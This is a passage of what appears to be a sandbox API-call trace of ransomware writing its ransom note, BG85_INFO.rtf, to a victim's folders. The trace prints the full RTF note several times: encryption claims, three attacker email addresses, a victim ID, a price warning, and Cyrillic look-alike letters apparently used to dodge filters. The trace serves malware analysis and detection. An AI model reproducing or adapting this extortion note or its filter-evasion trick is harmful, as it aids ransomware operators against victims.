imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0068.021] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0068.022] CloseHandle (hObject=0x1cc) returned 1 [0068.022] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\bg85_info.rtf")) returned 0xffffffff [0068.023] GetLastError () returned 0x2 [0068.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 